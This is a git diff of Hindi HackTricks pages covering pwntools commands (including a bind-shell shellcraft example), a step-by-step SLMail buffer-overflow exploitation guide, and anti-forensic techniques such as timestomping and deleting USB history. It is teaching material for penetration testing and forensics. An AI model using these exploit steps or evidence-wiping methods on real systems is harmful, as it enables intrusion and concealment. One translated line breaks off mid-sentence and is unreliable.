जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} ``` pip3 install pwntools ``` @@ -26,17 +27,17 @@ pwn asm -i * आउटपुट प्रकार (रॉ,हेक्स,स्ट्रिंग,ईएलएफ) * आउटपुट फ़ाइल संदर्भ (16,32,64,लिनक्स,विंडोज...) * बाइट्स से बचें (न्यू लाइन्स, नल, एक सूची) -* जीडीबी चलाकर आउटपुट का डीबग शेलकोड का चयन करें +* gdb चलाकर आउटपुट का डीबग शेलकोड चुनें -# **पॉन चेकसेक** +# **Pwn checksec** -चेकसेक स्क्रिप्ट +Checksec स्क्रिप्ट ``` pwn checksec ``` -# हैक constgrep +# Pwn constgrep -# हैक cyclic +# Pwn cyclic एक पैटर्न प्राप्त करें ``` @@ -58,11 +59,11 @@ pwn debug --exec /bin/bash pwn debug --pid 1234 pwn debug --process bash ``` -**चुन सकते हैं:** +**चयन कर सकते हैं:** -* कार्यकारी, नाम या पिडी संदर्भ (16,32,64,लिनक्स,विंडोज...) -* निष्पादन के लिए gdbscript -* सिसरूटपथ +* कार्यकारी, नाम या पीआईडी संदर्भ (16,32,64,लिनक्स,विंडोज...) +* निष्पादन करने के लिए gdbscript +* सिसरूटपैथ # Pwn disablenx @@ -72,11 +73,11 @@ pwn disablenx ``` # Pwn disasm -हेक्स ओपकोड को डिसैसेम्बल करें +हेक्स ओपकोड को disasemble करें ``` pwn disasm ffe4 ``` -**चुन सकते हैं:** +**चयन कर सकते हैं:** * संदर्भ (16,32,64,लिनक्स,विंडोज...) * मूल पता @@ -88,7 +89,7 @@ pwn disasm ffe4 ``` pwn elfdiff ``` -# हेक्स पाना +# हेक्स पान हेक्साडेसिमल प्रतिनिधित्व प्राप्त करें ```bash @@ -112,7 +113,7 @@ pwn phd # Pwn shellcraft -शैलकोड प्राप्त करें +शेलकोड प्राप्त करें ``` pwn shellcraft -l #List shellcodes pwn shellcraft -l amd #Shellcode with amd in the name @@ -122,18 +123,18 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port ``` **चयन करें:** -* शैलकोड और शैलकोड के लिए तार्किक +* शेलकोड और शेलकोड के लिए तार्किक * आउट फ़ाइल * आउटपुट प्रारूप -* डीबग (शैलकोड को dbg से जोड़ें) +* डीबग (शेलकोड पर dbg जोड़ें) * पहले (कोड से पहले डीबग ट्रैप) * बाद * ओपकोड का उपयोग न करें (डिफ़ॉल्ट: नल और नई लाइन) -* शैलकोड चलाएं +* शेलकोड चलाएं * रंग/कोई रंग नहीं * सिसकॉल्स की सूची -* संभावित शैलकोड की सूची -* ELF को एक साझा पुस्तकालय के रूप में उत्पन्न करें +* संभावित शेलकोड की सूची +* ELF को साझा पुस्तकालय के रूप में उत्पन्न करें # Pwn टेम्पलेट @@ -141,7 +142,7 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port ``` pwn template ``` -**चुन सकते हैं:** होस्ट, पोर्ट, उपयोगकर्ता, पासवर्ड, पथ और शांत +**का चयन कर सकते हैं:** होस्ट, पोर्ट, उपयोगकर्ता, पासवर्ड, पथ और शांत # Pwn अनहेक्स @@ -155,16 +156,17 @@ pwntools को अपडेट करने के लिए ``` pwn update ``` +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} diff --git a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md index c821efe1f..5ec20f763 100644 --- a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md +++ b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md @@ -1,24 +1,25 @@ -# Windows Exploiting (Basic Guide - OSCP lvl) +# Windows Exploiting (मूल गाइड - OSCP स्तर) + +{% hint style="success" %} +AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें** PRs के माध्यम से [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** को पीआर जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} -## **SLMail सेवा स्थापित करना शुरू करें** +## **SLMail सेवा को स्थापित करना शुरू करें** -## SLMail सेवा पुनः आरंभ करें +## SLMail सेवा को पुनः आरंभ करें -हर बार जब भी आपको **सेवा SLMail को पुनः आरंभ करने की आवश्यकता** होती है, तो आप विंडो कंसोल का उपयोग करके इसे कर सकते हैं: +हर बार जब भी आपको **सेवा SLMail को पुनः आरंभ करने** की आवश्यकता होती है, तो आप विंडोज कंसोल का उपयोग करके इसे कर सकते हैं: ``` net start slmail ``` @@ -48,25 +49,25 @@ print "Could not connect to "+ip+":"+port ``` ## **इम्यूनिटी डीबगर फ़ॉन्ट बदलें** -`विकल्प >> दिखावट >> फ़ॉन्ट >> बदलें(कंसोलस, बोल्ड, 9) >> ठीक है` +जाएं `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK` ## **प्रक्रिया को इम्यूनिटी डीबगर से जोड़ें:** -**फ़ाइल --> जोड़ें** +**File --> Attach** ![](<../.gitbook/assets/image (24) (1) (1).png>) -**और स्टार्ट बटन दबाएं** +**और START बटन दबाएं** -## **एक्सप्लॉइट भेजें और जांचें कि क्या ईआईपी प्रभावित है:** +## **एक्सप्लॉइट भेजें और जांचें कि क्या EIP प्रभावित है:** ![](<../.gitbook/assets/image (25) (1) (1).png>) -हर बार जब आप सेवा को तोड़ते हैं, तो आपको इस पृष्ठ के शुरू में दिखाया गया है कि आपको इसे पुनः प्रारंभ करना चाहिए। +हर बार जब आप सेवा को ब्रेक करते हैं, तो आपको इस पृष्ठ के शुरू में दिखाया गया है कि इसे पुनः आरंभ करना चाहिए। -## ईआईपी को संशोधित करने के लिए एक पैटर्न बनाएं +## EIP को संशोधित करने के लिए एक पैटर्न बनाएं -पैटर्न उस बफर के बराबर होना चाहिए जिसका आपने पहले सेवा को तोड़ने के लिए उपयोग किया था। +पैटर्न उसी बफर के बड़ा होना चाहिए जिसका आपने पिछले में सेवा को तोड़ने के लिए उपयोग किया था। ![](<../.gitbook/assets/image (26) (1) (1).png>) ``` @@ -86,7 +87,7 @@ print "Could not connect to "+ip+":"+port ``` लगता है **हम बफर के ऑफसेट 2606 में EIP को संशोधित कर सकते हैं**। -इसे जांचने के लिए एक्सप्लॉइट के बफर को संशोधित करें: +एक्सप्लॉइट के बफर को संशोधित करने की जांच करें: ``` buffer = 'A'*2606 + 'BBBB' + 'CCCC' ``` @@ -98,9 +99,9 @@ buffer = 'A'*2606 + 'BBBB' + 'CCCC' लगता है काम कर रहा है। -## स्टैक के अंदर शेलकोड स्थान की जांच करें +## स्टैक के अंदर शैलकोड स्थान की जांच करें -600B किसी भी शक्तिशाली शेलकोड के लिए पर्याप्त होना चाहिए। +600B किसी भी शक्तिशाली शैलकोड के लिए पर्याप्त होना चाहिए। चलिए बफर बदलते हैं: ``` @@ -114,9 +115,9 @@ buffer = 'A'*2606 + 'BBBB' + 'C'*600 आप देख सकते हैं कि जब सुरक्षा दोष तक पहुंचा जाता है, तो EBP शेलकोड की ओर प्वाइंट कर रहा है और हमें यहां एक शेलकोड स्थानित करने के लिए बहुत जगह है। -इस मामले में हमारे पास **0x0209A128 से 0x0209A2D6 = 430B** है। पर्याप्त। +इस मामले में हमारे पास **0x0209A128 से 0x0209A2D6 = 430B तक** है। पर्याप्त। -## बुरा वर्णों के लिए जांच करें +## बुरे वर्णों के लिए जांच करें फिर से बफर बदलें: ``` @@ -140,13 +141,13 @@ badchars = ( ) buffer = 'A'*2606 + 'BBBB' + badchars ``` -बैडचार्स 0x01 से शुरू होता है क्योंकि 0x00 लगभग हमेशा बुरा होता है। +बैडचार्स 0x01 से शुरू होते हैं क्योंकि 0x00 लगभग हमेशा बेकार होता है। -इस नए बफर के साथ एक्सप्लॉइट को बार-बार निष्पादित करें जिसमें वे वर्ण हटाए जाते हैं जो अनुपयोगी पाए जाते हैं:। +इस नए बफर के साथ एक्सप्लॉइट को बार-बार निष्पादित करें जिसमें वे वर्ण हटाए जाते हैं जो अनुपयोगी पाए जाते हैं। उदाहरण के लिए: -इस मामले में आप देख सकते हैं कि **आपको वर्ण 0x0A का उपयोग नहीं करना चाहिए** (क्योंकि मेमोरी में कुछ भी सहेजा नहीं गया है क्योंकि वर्ण 0x09)। +इस मामले में आप देख सकते हैं कि **आपको वर्ण 0x0A का उपयोग नहीं करना चाहिए** (क्योंकि वर्ण 0x09 मेमोरी में कुछ भी सहेजा नहीं गया है)। ![](<../.gitbook/assets/image (33) (1).png>) @@ -160,7 +161,7 @@ buffer = 'A'*2606 + 'BBBB' + badchars ``` !mona modules #Get protections, look for all false except last one (Dll of SO) ``` -आपको **मेमोरी मैप्स की सूची** बनानी है। कुछ DLL खोजें जिसमें: +आपको **मेमोरी मैप्स की सूची** बनानी होगी। कुछ DLL खोजें जिसमें: * **Rebase: False** * **SafeSEH: False** @@ -170,12 +171,12 @@ buffer = 'A'*2606 + 'BBBB' + badchars ![](<../.gitbook/assets/image (35) (1).png>) -अब, इस मेमोरी के अंदर आपको कुछ JMP ESP बाइट्स ढूंढने होंगे, इसके लिए निम्नलिखित को चलाएं: +अब, इस मेमोरी के अंदर आपको कुछ JMP ESP बाइट्स ढूंढने होंगे, इसे करने के लिए निम्नलिखित को चलाएं: ``` !mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP) !mona find -s "\xff\xe4" -m slmfc.dll # Example in this case ``` -**फिर, यदि कोई पता मिल जाता है, तो उसमें से एक चुनें जिसमें कोई भी बुरी चर न हो:** +**फिर, यदि कोई पता मिल जाता है, तो उसमें से एक चुनें जिसमें कोई भी बुरी वर्ण (badchar) न हो:** ![](<../.gitbook/assets/image (36) (1).png>) @@ -238,7 +239,7 @@ except: print "Could not connect to "+ip+":"+port ``` {% hint style="warning" %} -ऐसे शेलकोड होते हैं जो अपने आप को **अधिलेखित** कर देते हैं, इसलिए हमेशा शेलकोड के पहले कुछ NOPs जोड़ना महत्वपूर्ण है +ऐसे शेलकोड हैं जो अपने आप को **अधिलिखित** कर देंगे, इसलिए हमेशा शेलकोड से पहले कुछ NOPs जोड़ना महत्वपूर्ण है {% endhint %} ## शेलकोड को बेहतर बनाना @@ -247,16 +248,17 @@ print "Could not connect to "+ip+":"+port ``` EXITFUNC=thread -e x86/shikata_ga_nai ``` +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md index b9340c3c1..b0b2ba03d 100644 --- a/forensics/basic-forensic-methodology/anti-forensic-techniques.md +++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md @@ -1,143 +1,142 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारा संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %}
{% embed url="https://websec.nl/" %} -# समय-चिह्न +# टाइमस्टैम्प -किसी हमलावर को **फ़ाइलों के समय-चिह्नों को बदलने** में दिलचस्पी हो सकती है।\ -एमएफटी में समय-चिह्न ढूंढना संभव है जो गुणों `$STANDARD_INFORMATION` __ और __ `$FILE_NAME` में हैं। +एक हमलावता **फ़ाइलों के टाइमस्टैम्प को बदलने** में रुचि रख सकता है।\ +एमएफटी में टाइमस्टैम्प्स को खोजना संभव है जो विशेषता `$STANDARD_INFORMATION` __ और __ `$FILE_NAME` में हैं। -दोनों गुणों में 4 समय-चिह्न होते हैं: **संशोधन**, **पहुंच**, **निर्माण**, और **एमएफटी रजिस्ट्री संशोधन** (MACE या MACB)। +दोनों विशेषताएँ 4 टाइमस्टैम्प्स रखती हैं: **संशोधन**, **पहुंच**, **निर्माण**, और **एमएफटी रजिस्ट्री संशोधन** (MACE या MACB)। **Windows एक्सप्लोरर** और अन्य उपकरण **`$STANDARD_INFORMATION`** से जानकारी दिखाते हैं। ## टाइमस्टॉम्प - एंटी-फोरेंसिक टूल -यह उपकरण **`$STANDARD_INFORMATION`** के भीतर समय-चिह्न जानकारी को **संशोधित करता है** **लेकिन** **`$FILE_NAME`** के भीतर की जानकारी को **नहीं**। इसलिए, यह संदेहास्पद गतिविधि की पहचान करना संभव है। +यह टूल **`$STANDARD_INFORMATION`** के भीतर टाइमस्टैम्प जानकारी को **संशोधित** करता है **लेकिन** **`$FILE_NAME`** के भीतर जानकारी को **नहीं**। इसलिए, यह संदेहास्पद गतिविधि की पहचान करना संभव है। ## Usnjrnl -**USN Journal** (अपडेट सीक्वेंस नंबर जर्नल) NTFS (Windows NT फ़ाइल सिस्टम) का एक विशेषता है जो वॉल्यूम परिवर्तनों का पता लगाता है। [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) उपकरण इन परिवर्तनों का परीक्षण करने की अनुमति देता है। +**USN जर्नल** (अपडेट सीक्वेंस नंबर जर्नल) एनटीएफएस (विंडोज एनटी एफएस फ़ाइल सिस्टम) की एक विशेषता है जो वॉल्यूम परिवर्तनों का पता रखती है। [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) टूल इन परिवर्तनों की जांच करने की अनुमति देता है। ![](<../../.gitbook/assets/image (449).png>) -पिछली छवि उपकरण द्वारा दिखाई गई **आउटपुट** है जहां देखा जा सकता है कि कुछ **परिवर्तन किए गए थे** फ़ाइल में। +पिछली छवि टूल द्वारा दिखाई गई **आउटपुट** है जहां देखा जा सकता है कि कुछ **परिवर्तन किए गए थे** फ़ाइल में। ## $LogFile -एक फ़ाइल सिस्टम में सभी मेटाडेटा परिवर्तनों को एक प्रक्रिया में लॉग किया जाता है जिसे [व्राइट-अहेड लॉगिंग](https://en.wikipedia.org/wiki/Write-ahead_logging) के रूप में जाना जाता है। लॉग किए गए मेटाडेटा को `**$LogFile**` नामक एक फ़ाइल में रखा जाता है, जो एक NTFS फ़ाइल सिस्टम के मूल निर्देशिका में स्थित है। [LogFileParser](https://github.com/jschicht/LogFileParser) जैसे उपकरण का उपयोग इस फ़ाइल को पार्स करने और परिवर्तनों की पहचान करने के लिए किया जा सकता है। +एक फ़ाइल सिस्टम में सभी मेटाडेटा परिवर्तनों को एक प्रक्रिया में लॉग किया जाता है जिसे [राइट-अहेड लॉगिंग](https://en.wikipedia.org/wiki/Write-ahead_logging) के रूप में जाना जाता है। लॉग किए गए मेटाडेटा को `**$LogFile**` नामक एक फ़ाइल में रखा जाता है, जो एनटीएफएस फ़ाइल सिस्टम के मूल निर्देशिका में स्थित है। [LogFileParser](https://github.com/jschicht/LogFileParser) जैसे उपकरण का उपयोग इस फ़ाइल को पार्स करने और परिवर्तनों की पहचान करने के लिए किया जा सकता है। ![](<../../.gitbook/assets/image (450).png>) फिर से, उपकरण के आउटपुट में देखा जा सकता है कि **कुछ परिवर्तन किए गए थे**। -इसी उपकरण का उपयोग करके समय-चिह्नों को **किस समय संशोधित किया गया था** की पहचान करना संभव है: +इसी उपकरण का उपयोग करके टाइमस्टैम्प्स को **किस समय संशोधित किया गया था** की पहचान करना संभव है: ![](<../../.gitbook/assets/image (451).png>) * CTIME: फ़ाइल का निर्माण समय * ATIME: फ़ाइल का संशोधन समय -* MTIME: फ़ाइल का MFT रजिस्ट्री संशोधन +* MTIME: फ़ाइल का एमएफटी रजिस्ट्री संशोधन * RTIME: फ़ाइल का पहुंच समय ## `$STANDARD_INFORMATION` और `$FILE_NAME` तुलना -संदेहास्पद संशोधित फ़ाइलों की पहचान करने के लिए एक और तरीका होगा कि दोनों गुणों पर समय की तुलना करें और **मिलान** के लिए देखें **असंगतियाँ**। +संदेहास्पद संशोधित फ़ाइलों की पहचान करने का एक और तरीका होगा कि दोनों विशेषताओं पर समय की तुलना करें और **मिलान** के लिए देखें **असंगतियाँ**। ## नैनोसेकंड -**NTFS** समय-चिह्नों का एक **प्रेसिजन** है **100 नैनोसेकंड**। फिर, 2010-10-10 10:10:**00.000:0000 जैसे समय-चिह्न वाली फ़ाइलें खोजना बहुत संदेहास्पद है। +**एनटीएफएस** टाइमस्टैम्प्स का एक **प्रेसिजन** है **100 नैनोसेकंड**। फिर, 2010-10-10 10:10:**00.000:0000 जैसे टाइमस्टैम्प्स वाली फ़ाइलें खोजना बहुत संदेहास्पद है**। ## SetMace - एंटी-फोरेंसिक टूल -यह उपकरण दोनों गुणों `$STARNDAR_INFORMATION` और `$FILE_NAME` को संशोधित कर सकता है। हालांकि, Windows Vista से, इस जानकारी को संशोधित करने के लिए लाइव ओएस की आवश्यकता है। +यह उपकरण दोनों विशेषताएँ `$STARNDAR_INFORMATION` और `$FILE_NAME` को संशोधित कर सकता है। हालांकि, Windows Vista से, इस जानकारी को संशोधित करने के लिए एक लाइव ओएस की आवश्यकता है। # डेटा छुपाना -NFTS एक क्लस्टर और न्यूनतम जानकारी आकार का उपयोग करता है। इसका मतलब है कि यदि एक फ़ाइल एक क्लस्टर और आधा उपयोग करती है, तो **शेष आधा कभी भी उपयोग नहीं होगा** जब तक फ़ाइल हटाई नहीं जाती। फिर, इस "छिपी" जगह में डेटा छुपाना संभव है। +एनएफटीएस एक क्लस्टर और न्यूनतम जानकारी आकार का उपयोग करता है। इसका मतलब है कि यदि एक फ़ाइल एक क्लस्टर और आधा उपयोग करती है, तो **शेष आधा कभी भी उपयोग नहीं होगा** जब तक फ़ाइल हटाई नहीं जाती। फिर, इस "छुपी" जगह में डेटा छुपाना संभव है। -इस तरह के "छिपी" जगह में डेटा छुपाने की अनुमति देने वाले उपकरण जैसे slacker हैं। हालांकि, `$logfile` और `$usnjrnl` का विश्लेषण दिखा सकता है कि कुछ डेटा जोड़ा गया था: +इस तरह के "छुपे" स्थान में डेटा छुपाने की अनुमति देने वाले उपकरण जैसे slacker हैं। हालांकि, `$logfile` और `$usnjrnl` का विश्लेषण दिखा सकता है कि कुछ डेटा जोड़ा गया था: ![](<../../.gitbook/assets/image (452).png>) -फिर, FTK Imager जैसे उपकरण का उपयोग करके छिपी जगह पुनः प्राप्त किया जा सकता है। ध्यान दें कि इस प्रकार के उपकरण सामग्री को अंधाकृत या यहाँ तक कि एन्क्रिप्टेड भी सहेज सकते हैं। +फिर, FTK इमेजर जैसे उपकरण का उपयोग करके छुपे स्थान को पुनः प्राप्त किया जा सकता है। ध्यान दें कि इस प्रकार के उपकरण सामग्री को अस्पष्ट या यहाँ तक कि एन्क्रिप्टेड भी सहेज सकते हैं। # UsbKill -यह एक उपकरण है जो **USB** पोर्ट में किसी भी परिवर्तन को डिटेक्ट करता है तो कंप्यूटर को **बंद कर देगा**।\ +यह एक उपकरण है जो कंप्यूटर को **USB** पोर्ट में किसी भी परिवर्तन को डिटेक्ट करता है तो बंद कर देगा।\ इसे खोजने का एक तरीका है कि चल रहे प्रक्रियाओं की जांच करें और **प्रत्येक पायथन स्क्रिप्ट की जांच** करें। # लाइव लिनक्स वितरण -ये डिस्ट्रो **रैम मेमोरी के अंदर चलाए जाते हैं**। इन्हें पहचानने का एकमात्र तरीका है **यदि NTFS फाइल-सिस्टम को लेखन अनुमतियों के साथ माउंट किया गया है**। यदि यह केवल पढ़ने की अनुमतियों के साथ माउंट किया गया है तो उपद्रव का पता लगाना संभव नहीं होगा। +ये डिस्ट्रो **रैम** मेमोरी के अंदर **चलाए जाते हैं**। इन्हें पहचानने का एकमात्र तरीका है **यदि एनटीएफएस फाइल-सिस्टम को लेखन अनुमतियों के साथ माउंट किया गया है**। यदि यह केवल पढ़ने की अनुमति के साथ माउंट किया गया है तो उपद्रव का पता लगाना संभव नहीं होगा। # सुरक्षित मिटाना [https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization) -# Windows कॉन्फ़िगरेशन +# विंडोज कॉन्फ़िगरेशन फोरेंसिक्स जांच को कठिन बनाने के लिए कई विंडोज लॉगिंग विधियों को अक्षम करना संभव है। -## समय-चिह्नों को अक्षम करें - UserAssist +## टाइमस्टैम्प्स को अक्षम करें - UserAssist -यह एक रजिस्ट्री कुंजी है जो प्रत्येक क्रियाशील द्वारा चलाई गई प्रत्येक कार्यक्रम के दिनांक और घंटे को बनाए रखती है। +यह एक रजिस्ट्री कुंजी है जो प्रत्येक एक्जीक्यूटेबल को उपयोगकर्ता द्वारा चलाया गया था जब तारीख और समय बनाए रखती है। -UserAssist को अक्षम करने के लिए दो कदम हैं: - -1. दो रजिस्ट्री कुंजियों को सेट करें, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` और `HKEY_CURRENT_USER\SOFTWARE +UserAssist को अक्षम करने के लिए दो ## हटाएं USB इतिहास -सभी **USB डिवाइस एंट्रीज** Windows रजिस्ट्री में **USBSTOR** रजिस्ट्री कुंजी के तहत संग्रहीत होती हैं जो उपकंजी शामिल करती हैं जो जब भी आप अपने PC या लैपटॉप में एक USB डिवाइस प्लग करते हैं। आप इस कुंजी को यहाँ पा सकते हैं `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`। **इसे हटाने** से आप USB इतिहास को हटा देंगे।\ -आप इसे हटाने के लिए उपकरण [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) का भी उपयोग कर सकते हैं (और इन्हें हटाने के लिए)। +सभी **USB डिवाइस एंट्रीज** Windows रजिस्ट्री में **USBSTOR** रजिस्ट्री कुंजी के तहत संग्रहीत होती हैं जिसमें उप-कुंजी होती हैं जो जब भी आप अपने PC या लैपटॉप में USB डिवाइस प्लग करते हैं तो बनाई जाती हैं। आप इस कुंजी को यहाँ पा सकते हैं 